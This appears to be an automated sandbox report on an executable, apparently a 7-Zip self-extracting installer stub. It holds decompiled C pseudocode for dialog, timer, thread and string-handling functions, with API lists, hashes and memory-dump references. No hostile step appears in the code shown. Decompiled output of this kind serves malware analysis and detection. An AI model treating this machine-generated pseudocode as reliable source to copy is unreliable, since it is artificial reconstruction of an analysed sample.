                                          0x0040b898
                                          0x0040b8a3
                                          0x0040b8b6
                                          0x0040b8c0
                                          0x0040b8c5
                                          0x0040b8c7
                                          0x0040b8cc
                                          0x0040b8d6
                                          0x0040b8de
                                          0x0040b8e6
                                          0x0040b8ee
                                          0x0040b8f6
                                          0x0040b8fe
                                          0x0040b906
                                          0x0040b90e
                                          0x0040b916
                                          0x0040b91a
                                          0x0040b923
                                          0x0040b925
                                          0x0040b930
                                          0x0040b93b
                                          0x0040b940
                                          0x0040b942
                                          0x0040b942
                                          0x0040b942
                                          0x0040b945
                                          0x00000000
                                          0x00000000
                                          0x0040b947
                                          0x0040b94b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b94b
                                          0x0040b94d
                                          0x0040b94d
                                          0x0040b951
                                          0x0040b954
                                          0x0040b95b
                                          0x0040b95b
                                          0x0040b964
                                          0x0040b968
                                          0x0040b96d
                                          0x0040b96e
                                          0x00000000
                                          0x0040b978
                                          0x0040b81b
                                          0x0040b820
                                          0x0040b822
                                          0x0040b826
                                          0x0040b82a
                                          0x0040b82b
                                          0x0040b822
                                          0x0040b830
                                          0x0040b835
                                          0x0040b851
                                          0x0040b854
                                          0x00000000
                                          0x0040b85a
                                          0x0040b862
                                          0x0040b875
                                          0x0040b875
                                          0x0040b837
                                          0x0040b837
                                          0x0040b846
                                          0x0040b84a
                                          0x0040b84b
                                          0x0040b84f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b84f
                                          0x0040b97d
                                          0x0040b97d
                                          0x0040b97d
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: memcpy$??2@??3@memset
                                          • String ID: gj
                                          • API String ID: 1510051167-4203073231
                                          • Opcode ID: fa11bfa1c03060d87f7550f12323f1151fe59167bef6b5b9de342155d4eadc05
                                          • Instruction ID: 5ab1223f956dad006c461569b39dc5db1a7a3ac289c35279b9943f5a0f586916
                                          • Opcode Fuzzy Hash: fa11bfa1c03060d87f7550f12323f1151fe59167bef6b5b9de342155d4eadc05
                                          • Instruction Fuzzy Hash: DB419BB25043009FC324EF25C88095BB7E5FF99718F148E2EE4DA97652E734E9498B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405F0F, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00405F0F(void* __ecx, intOrPtr* __edx) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _v20;
				char _v24;
				signed int _v32;
				void* _v36;
				short _v40;
				short _v44;
				signed int _v52;
				short _v56;
				char _v60;
				void* __esi;
				void* _t39;
				void* _t48;
				signed int _t55;
				void* _t56;
				void* _t57;

				_v52 = _v52 | 0xffffffff;
				_t57 = __ecx;
				_v8 = __edx;
				_v56 = 0;
				_v60 = 0x41db9c;
				_v44 = 0;
				_v40 = 0;
				_t39 = E00414091(__ecx, 1);
				_t79 = _t39;
				if(_t39 != 0) {
					L6:
					E004143C2(_t39,  &_v24);
					E00414427( &_v24, 0x422494);
					E004144C5( &_v24, ";!@Install@!UTF-8!");
					E004144C5( &_v24,  *_v8);
					E004144C5( &_v24, ";!@InstallEnd@!");
					_t48 = E004150DD(0x41db9c,  &_v60, _v24, _v20,  &_v12);
					__eflags = _t48;
					if(_t48 != 0) {
						L9:
						_push(_v24);
						L10:
						L0041C160();
						_v60 = 0x41db9c;
						E00413DDA( &_v52);
						return 0;
					}
					__eflags = _v12 - _v20;
					if(_v12 != _v20) {
						goto L9;
					}
					_push(_v24);
					L0041C160();
					_v60 = 0x41db9c;
					E00413DDA( &_v52);
					return 1;
				}
				E00414803( &_v36, __ecx);
				_t55 = E00403813( &_v36, _t79);
				if(_t55 >= 0) {
					_t76 = _v36;
					_v32 = _t55;
					 *((short*)(_v36 + _t55 * 2)) = 0;
					_t56 = E0040468A(_v36, _t76);
					__eflags = _t56;
					if(_t56 == 0) {
						goto L2;
					}
					_v44 = 0;
					_v40 = 0;
					_t39 = E00414091(_t57, 1);
					__eflags = _t39;
					if(_t39 == 0) {
						goto L2;
					}
					_push(_v36);
					L0041C160();
					goto L6;
				}
				L2:
				_push(_v36);
				goto L10;
			}




















                                          0x00405f15
                                          0x00405f1c
                                          0x00405f2b
                                          0x00405f2e
                                          0x00405f31
                                          0x00405f34
                                          0x00405f37
                                          0x00405f3a
                                          0x00405f3f
                                          0x00405f41
                                          0x00405f96
                                          0x00405f99
                                          0x00405fa6
                                          0x00405fb3
                                          0x00405fc0
                                          0x00405fcd
                                          0x00405fe0
                                          0x00405fe5
                                          0x00405fe7
                                          0x00406009
                                          0x00406009
                                          0x0040600c
                                          0x0040600c
                                          0x00406015
                                          0x00406018
                                          0x00000000
                                          0x0040601d
                                          0x00405fec
                                          0x00405fef
                                          0x00000000
                                          0x00000000
                                          0x00405ff1
                                          0x00405ff4
                                          0x00405ffd
                                          0x00406000
                                          0x00000000
                                          0x00406005
                                          0x00405f47
                                          0x00405f4f
                                          0x00405f56
                                          0x00405f60
                                          0x00405f65
                                          0x00405f68
                                          0x00405f6f
                                          0x00405f74
                                          0x00405f76
                                          0x00000000
                                          0x00000000
                                          0x00405f7e
                                          0x00405f81
                                          0x00405f84
                                          0x00405f89
                                          0x00405f8b
                                          0x00000000
                                          0x00000000
                                          0x00405f8d
                                          0x00405f90
                                          0x00000000
                                          0x00405f95
                                          0x00405f58
                                          0x00405f58
                                          0x00000000

                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405FF4
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405F90
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040600C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy
                                          • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!$&@
                                          • API String ID: 750647942-3840191401
                                          • Opcode ID: 30ec7349826eb5619f19a58d332a305a58701340e5a3dcc7e5453147237b2012
                                          • Instruction ID: c3f501718d29e0609bacf028bb7e0f5575d8248d997bf9953d440c615c71183d
                                          • Opcode Fuzzy Hash: 30ec7349826eb5619f19a58d332a305a58701340e5a3dcc7e5453147237b2012
                                          • Instruction Fuzzy Hash: C7314F71D00119AADF05EFD6DD829EEBB74EF94318F20002BF502B21E1DB791A85CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401AA4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E00401AA4() {
				struct HWND__* _v8;
				short _v264;
				short _v2312;
				WCHAR* _t15;
				struct HWND__* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				WCHAR* _t35;
				WCHAR* _t36;
				WCHAR* _t37;
				void* _t39;
				intOrPtr* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t48;

				_t15 =  *0x422714; // 0x0
				_t45 = _t44 - 0x904;
				_t32 = 0;
				_t43 = _t34;
				if(_t15 == 0) {
					_t35 = 0x27;
					wsprintfW( &_v2312, E00403CE0(_t35),  *_t43,  *((intOrPtr*)(_t43 + 0xc)));
					_t46 = _t45 + 0x10;
					_v8 = 0;
					if( *((intOrPtr*)(_t43 + 0x10)) <= 0) {
						L8:
						if(";!@Install@!UTF-8!" == 0x3b) {
							_t36 =  &_v2312;
							L11:
							E0040959E(_t36, _t39);
							L12:
							E00405A7A();
							ExitProcess(0xa);
						}
						_push(_t32);
						_t37 = 3;
						MessageBoxW(_t32,  &_v2312, E00403CE0(_t37), ??);
						goto L12;
					}
					_t33 = _t43 + 0x14;
					do {
						wsprintfW( &_v264, L"\t0x%p\n",  *_t33);
						_t46 = _t46 + 0xc;
						lstrcatW( &_v2312,  &_v264);
						_v8 = _v8 + 1;
						_t33 = _t33 + 4;
					} while (_v8 <  *((intOrPtr*)(_t43 + 0x10)));
					_t32 = 0;
					goto L8;
				}
				_t48 =  *0x422716 - _t32; // 0x0
				if(_t48 != 0) {
					 *0x422714 = _t15;
				}
				_t36 = E00403CE0(_t15);
				goto L11;
			}



















                                          0x00401aa7
                                          0x00401aac
                                          0x00401ab4
                                          0x00401ab7
                                          0x00401abb
                                          0x00401add
                                          0x00401af6
                                          0x00401af8
                                          0x00401afb
                                          0x00401b01
                                          0x00401b3d
                                          0x00401b44
                                          0x00401b60
                                          0x00401b66
                                          0x00401b66
                                          0x00401b6b
                                          0x00401b6b
                                          0x00401b72
                                          0x00401b72
                                          0x00401b46
                                          0x00401b49
                                          0x00401b58
                                          0x00000000
                                          0x00401b58
                                          0x00401b03
                                          0x00401b06
                                          0x00401b14
                                          0x00401b16
                                          0x00401b27
                                          0x00401b2d
                                          0x00401b33
                                          0x00401b36
                                          0x00401b3b
                                          0x00000000
                                          0x00401b3b
                                          0x00401abd
                                          0x00401ac4
                                          0x00401ac8
                                          0x00401ac8
                                          0x00401ad4
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: wsprintf$ExitMessageProcesslstrcat
                                          • String ID: 0x%p
                                          • API String ID: 1920160435-1745605757
                                          • Opcode ID: 385690d3a1d49b3415e5c7f5d9ca7004a209e28fb46c1b54cb9a9d937d291444
                                          • Instruction ID: bdd98ded1a4888b9718e7119b40d0133e4242b4b1d5a6e7b56f428a96039426d
                                          • Opcode Fuzzy Hash: 385690d3a1d49b3415e5c7f5d9ca7004a209e28fb46c1b54cb9a9d937d291444
                                          • Instruction Fuzzy Hash: FA2157B1A04218BFDB20EFB4DD85A9A77BCEF44344F50047AA501F3191DB78AA448B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407E82, Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E00407E82(long __ecx, struct HWND__* _a4) {
				struct HDC__* _v8;
				char _v324;
				short _v326;
				short _v328;
				void _v360;
				char _v432;
				short _v436;
				int _v452;
				void _v860;
				DLGTEMPLATE* _t22;
				struct HDC__* _t24;
				signed int _t26;
				long _t30;
				signed int _t32;
				CHAR* _t34;
				struct HINSTANCE__* _t41;

				_t30 = __ecx;
				_t32 = 0x58;
				memcpy( &_v360, 0x4224a0, _t32 << 2);
				_v860 = 0x1f4;
				if(SystemParametersInfoW(0x29, 0,  &_v860, 0) != 0) {
					_t24 = GetDC(0);
					_v8 = _t24;
					_t26 = MulDiv(_v452, 0x48, GetDeviceCaps(_t24, 0x5a));
					ReleaseDC(0, _v8);
					_v326 = _v436;
					_v328 =  ~_t26;
					_v324 = _v432;
				}
				_t41 = GetModuleHandleW(0);
				if( *(_t30 + 0x38) == 0) {
					L4:
					_t22 =  &_v360;
					 *(_t30 + 0x38) = 0;
				} else {
					_push(0);
					_t34 = 5;
					_t22 = E00403908(_t34,  *(_t30 + 0x38) & 0x0000ffff);
					if(_t22 == 0) {
						goto L4;
					}
				}
				return DialogBoxIndirectParamW(_t41, _t22, _a4, E00407640, _t30);
			}



















                                          0x00407e90
                                          0x00407e92
                                          0x00407e9e
                                          0x00407ead
                                          0x00407ebf
                                          0x00407ec2
                                          0x00407ecb
                                          0x00407edd
                                          0x00407eeb
                                          0x00407ef8
                                          0x00407f05
                                          0x00407f0c
                                          0x00407f0c
                                          0x00407f19
                                          0x00407f1e
                                          0x00407f31
                                          0x00407f31
                                          0x00407f37
                                          0x00407f20
                                          0x00407f24
                                          0x00407f27
                                          0x00407f28
                                          0x00407f2f
                                          0x00000000
                                          0x00000000
                                          0x00407f2f
                                          0x00407f4f

                                          APIs
                                          • SystemParametersInfoW.USER32 ref: 00407EB7
                                          • GetDC.USER32(00000000), ref: 00407EC2
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407ECE
                                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407EDD
                                          • ReleaseDC.USER32 ref: 00407EEB
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00407F13
                                          • DialogBoxIndirectParamW.USER32 ref: 00407F45
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystem
                                          • String ID:
                                          • API String ID: 3212456201-0
                                          • Opcode ID: 6c6e9f6cbb186afbd910bba0e3b424dc6f845c5392de7f31c0f4edd618176398
                                          • Instruction ID: e5cbe167788b7df0f190fda5ad4873b435a8e75dd499519e5841f70fb4c46128
                                          • Opcode Fuzzy Hash: 6c6e9f6cbb186afbd910bba0e3b424dc6f845c5392de7f31c0f4edd618176398
                                          • Instruction Fuzzy Hash: AC219371D40668BFDB215F619C48EEB7BBCEB89711F4040AAF909A6190D7344E80CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408A8A, Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00408A8A(void* __ecx) {
				int _t10;
				signed int _t18;
				void* _t21;
				void* _t25;
				void* _t27;
				intOrPtr _t30;
				signed int _t31;
				void* _t35;

				_t27 = __ecx;
				_t30 =  *0x4228e0; // 0x0
				if(_t30 != 0) {
					_t10 = EndDialog( *(__ecx + 4), 0);
				}
				_t31 =  *0x4228d4; // 0x0
				if(_t31 != 0) {
					KillTimer( *(_t27 + 4), 1);
					_t32 =  *0x42245c & 0x00000100;
					if(( *0x42245c & 0x00000100) == 0 || E00408A46(_t27, _t25, _t32) != 0) {
						_push(0);
						_push( *(_t27 + 4));
						L13:
						return EndDialog();
					}
					_t18 =  *0x4228d4; // 0x0
					_t10 = SetTimer( *(_t27 + 4), 1, _t18 * 0xa, 0);
				}
				_t35 =  *0x422770 - 1; // 0x2
				if(_t35 != 0) {
					_t21 =  *0x422720; // 0x4f0
					if(_t21 != 0) {
						SuspendThread(_t21);
						_t37 =  *0x42245c & 0x00000100;
						if(( *0x42245c & 0x00000100) == 0 || E00408A46(_t27, _t25, _t37) != 0) {
							 *0x4228cc = 1;
							TerminateThread(_t21, 0x16);
							_push(0);
							_push( *(_t27 + 4));
							goto L13;
						} else {
							return ResumeThread(_t21);
						}
					}
				}
				return _t10;
			}











                                          0x00408a96
                                          0x00408a98
                                          0x00408a9e
                                          0x00408aa4
                                          0x00408aa4
                                          0x00408aa9
                                          0x00408aaf
                                          0x00408ab5
                                          0x00408abb
                                          0x00408ac5
                                          0x00408b1f
                                          0x00408b20
                                          0x00408b39
                                          0x00000000
                                          0x00408b39
                                          0x00408ad2
                                          0x00408ae0
                                          0x00408ae0
                                          0x00408ae6
                                          0x00408aec
                                          0x00408aee
                                          0x00408af6
                                          0x00408af9
                                          0x00408aff
                                          0x00408b09
                                          0x00408b28
                                          0x00408b2e
                                          0x00408b34
                                          0x00408b36
                                          0x00000000
                                          0x00408b16
                                          0x00000000
                                          0x00408b17
                                          0x00408b09
                                          0x00408af6
                                          0x00408b3f

                                          APIs
                                          • EndDialog.USER32(?,00000000), ref: 00408AA4
                                          • KillTimer.USER32(?,00000001), ref: 00408AB5
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408AE0
                                          • SuspendThread.KERNEL32(000004F0), ref: 00408AF9
                                          • ResumeThread.KERNEL32(000004F0), ref: 00408B17
                                          • EndDialog.USER32(?,00000000), ref: 00408B39
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DialogThreadTimer$KillResumeSuspend
                                          • String ID:
                                          • API String ID: 4151135813-0
                                          • Opcode ID: 885b3203f5fafc8ea029e998e3dfa88956fb95a6329574f64dc11b18cd69f5ab
                                          • Instruction ID: e0febfc1c518c38718134784bfd0cfd8211ff2635dc020f4aeb641ff724bccfa
                                          • Opcode Fuzzy Hash: 885b3203f5fafc8ea029e998e3dfa88956fb95a6329574f64dc11b18cd69f5ab
                                          • Instruction Fuzzy Hash: 98116DB0700204AFD7256F21EF85A6737ADEB60785B40403EF696A15A0CFB8AC02DF1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403526, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00403526(void* __ecx, void* __edx) {
				char _v16;
				char _v28;
				void* _t18;
				void* _t34;
				void* _t51;
				void* _t52;
				intOrPtr* _t53;

				_t51 = __ecx;
				_t52 = __edx;
				E004147DF(_t18,  &_v16);
				E004148C7( &_v16, __edx);
				E00414922( &_v16, "\\");
				E00414803( &_v28, L"%%T\\");
				E00414BA6(__ecx,  &_v28,  &_v16);
				_push(_v28);
				L0041C160();
				E004148C7( &_v16, _t52);
				E00414922( &_v16, "/");
				E00414803( &_v28, L"%%T/");
				E00414BA6(_t51,  &_v28,  &_v16);
				L0041C160();
				 *_t53 = 0x41dbd4;
				E00414803( &_v28, _v28);
				_t34 = E00414BA6(_t51,  &_v28, _t52);
				_push(_v28);
				L0041C160();
				_push(_v16);
				L0041C160();
				return _t34;
			}










                                          0x0040352e
                                          0x00403533
                                          0x00403535
                                          0x0040353e
                                          0x0040354b
                                          0x00403558
                                          0x00403567
                                          0x0040356c
                                          0x0040356f
                                          0x00403579
                                          0x00403586
                                          0x00403593
                                          0x004035a2
                                          0x004035aa
                                          0x004035b2
                                          0x004035b9
                                          0x004035c5
                                          0x004035ca
                                          0x004035cd
                                          0x004035d2
                                          0x004035d5
                                          0x004035df

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040356F
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004035AA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004035CD
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004035D5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy$??2@
                                          • String ID: %%T/$%%T\
                                          • API String ID: 3447362686-2679640699
                                          • Opcode ID: 2bd3869f0c11202dcf2497b639ef63ba0f5185e1f633ba9c7ad340e17c03d490
                                          • Instruction ID: 166c9580e81c2123b542eeb7ffed12b91935a7def8928b4aa084c00800812ce8
                                          • Opcode Fuzzy Hash: 2bd3869f0c11202dcf2497b639ef63ba0f5185e1f633ba9c7ad340e17c03d490
                                          • Instruction Fuzzy Hash: B0113DB5D441096A8B04FBA1DC93DEFB77C9E84704F10416FB112B2092DF686AC5CA98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004035E0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E004035E0(void* __ecx, void* __edx) {
				char _v16;
				char _v28;
				void* _t18;
				void* _t34;
				void* _t51;
				void* _t52;
				intOrPtr* _t53;

				_t51 = __ecx;
				_t52 = __edx;
				E004147DF(_t18,  &_v16);
				E004148C7( &_v16, __edx);
				E00414922( &_v16, "\\");
				E00414803( &_v28, L"%%S\\");
				E00414BA6(__ecx,  &_v28,  &_v16);
				_push(_v28);
				L0041C160();
				E004148C7( &_v16, _t52);
				E00414922( &_v16, "/");
				E00414803( &_v28, L"%%S/");
				E00414BA6(_t51,  &_v28,  &_v16);
				L0041C160();
				 *_t53 = L"%%S";
				E00414803( &_v28, _v28);
				_t34 = E00414BA6(_t51,  &_v28, _t52);
				_push(_v28);
				L0041C160();
				_push(_v16);
				L0041C160();
				return _t34;
			}










                                          0x004035e8
                                          0x004035ed
                                          0x004035ef
                                          0x004035f8
                                          0x00403605
                                          0x00403612
                                          0x00403621
                                          0x00403626
                                          0x00403629
                                          0x00403633
                                          0x00403640
                                          0x0040364d
                                          0x0040365c
                                          0x00403664
                                          0x0040366c
                                          0x00403673
                                          0x0040367f
                                          0x00403684
                                          0x00403687
                                          0x0040368c
                                          0x0040368f
                                          0x00403699

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403629
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403664
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403687
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040368F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy$??2@
                                          • String ID: %%S/$%%S\
                                          • API String ID: 3447362686-358529586
                                          • Opcode ID: c5102c029cdb3d12ac855eb080264e10659566beaa8db6ce68d0d1493529207a
                                          • Instruction ID: 6751733f6835679305e27ae318cc34a62e234db39242876c41385dbdc84acb9b
                                          • Opcode Fuzzy Hash: c5102c029cdb3d12ac855eb080264e10659566beaa8db6ce68d0d1493529207a
                                          • Instruction Fuzzy Hash: 46113DB5D440186ACB04FBA1DC93DEFB77C9E84704F10416FB112B2092EF786AC5CAA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040369A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0040369A(void* __ecx, void* __edx) {
				char _v16;
				char _v28;
				void* _t18;
				void* _t34;
				void* _t51;
				void* _t52;
				intOrPtr* _t53;

				_t51 = __ecx;
				_t52 = __edx;
				E004147DF(_t18,  &_v16);
				E004148C7( &_v16, __edx);
				E00414922( &_v16, "\\");
				E00414803( &_v28, L"%%M\\");
				E00414BA6(__ecx,  &_v28,  &_v16);
				_push(_v28);
				L0041C160();
				E004148C7( &_v16, _t52);
				E00414922( &_v16, "/");
				E00414803( &_v28, L"%%M/");
				E00414BA6(_t51,  &_v28,  &_v16);
				L0041C160();
				 *_t53 = L"%%M";
				E00414803( &_v28, _v28);
				_t34 = E00414BA6(_t51,  &_v28, _t52);
				_push(_v28);
				L0041C160();
				_push(_v16);
				L0041C160();
				return _t34;
			}










                                          0x004036a2
                                          0x004036a7
                                          0x004036a9
                                          0x004036b2
                                          0x004036bf
                                          0x004036cc
                                          0x004036db
                                          0x004036e0
                                          0x004036e3
                                          0x004036ed
                                          0x004036fa
                                          0x00403707
                                          0x00403716
                                          0x0040371e
                                          0x00403726
                                          0x0040372d
                                          0x00403739
                                          0x0040373e
                                          0x00403741
                                          0x00403746
                                          0x00403749
                                          0x00403753

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004036E3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040371E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403741
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403749
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy$??2@
                                          • String ID: %%M/$%%M\
                                          • API String ID: 3447362686-4143866494
                                          • Opcode ID: e762984c76011ef12ca27b7a1e2371d27fc4346b0628bafdf22f5638e4ca445c
                                          • Instruction ID: 917775b58852407d444846b0aa1479805c178b4686cdde28d42bb90dc1711a01
                                          • Opcode Fuzzy Hash: e762984c76011ef12ca27b7a1e2371d27fc4346b0628bafdf22f5638e4ca445c
                                          • Instruction Fuzzy Hash: AF1130B5D440187ACB04FB91DC93DEFB77C9E84704F10406FB116B2092EF686AC5CA98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407E2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00407E2D(void* __ecx) {
				struct HINSTANCE__* _t2;
				struct HWND__* _t3;
				CHAR* _t11;
				void* _t13;
				struct HWND__* _t14;
				struct HWND__* _t16;

				_t13 = __ecx;
				_t2 = LoadLibraryA("uxtheme");
				if(_t2 != 0) {
					_t3 = GetProcAddress(_t2, "SetWindowTheme");
					_t16 = _t3;
					if(_t16 == 0) {
						L7:
						return _t3;
					}
					_t3 = GetWindow( *(_t13 + 4), 5);
					_t14 = _t3;
					if(_t14 == 0) {
						L6:
						goto L7;
					}
					_t11 = " ";
					do {
						_t16->i(_t14, _t11, _t11);
						_t3 = GetWindow(_t14, 2);
						_t14 = _t3;
					} while (_t14 != 0);
					goto L6;
				}
				return _t2;
			}









                                          0x00407e33
                                          0x00407e35
                                          0x00407e3d
                                          0x00407e46
                                          0x00407e4c
                                          0x00407e50
                                          0x00407e7f
                                          0x00000000
                                          0x00407e7f
                                          0x00407e5f
                                          0x00407e61
                                          0x00407e65
                                          0x00407e7e
                                          0x00000000
                                          0x00407e7e
                                          0x00407e68
                                          0x00407e6d
                                          0x00407e70
                                          0x00407e75
                                          0x00407e77
                                          0x00407e79
                                          0x00000000
                                          0x00407e7d
                                          0x00407e81

                                          APIs
